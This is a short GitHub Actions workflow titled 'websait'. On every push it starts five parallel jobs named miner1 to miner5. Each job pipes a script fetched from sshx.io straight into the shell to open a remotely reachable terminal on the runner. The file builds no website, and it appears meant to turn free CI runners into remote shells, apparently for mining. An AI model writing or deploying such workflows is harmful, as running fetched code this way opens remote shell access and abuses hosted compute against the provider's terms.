name: websait

on:
  push:
  workflow_dispatch:

jobs:
  miner1:
    runs-on: ubuntu-latest
    steps:
      - name: Start SSHX
        run: |
          curl -sSf https://sshx.io/get | sh -s run

  miner2:
    runs-on: ubuntu-latest
    steps:
      - name: Start SSHX
        run: |
          curl -sSf https://sshx.io/get | sh -s run

  miner3:
    runs-on: ubuntu-latest
    steps:
      - name: Start SSHX
        run: |
          curl -sSf https://sshx.io/get | sh -s run

  miner4:
    runs-on: ubuntu-latest
    steps:
      - name: Start SSHX
        run: |
          curl -sSf https://sshx.io/get | sh -s run

  miner5:
    runs-on: ubuntu-latest
    steps:
      - name: Start SSHX
        run: |
          curl -sSf https://sshx.io/get | sh -s run
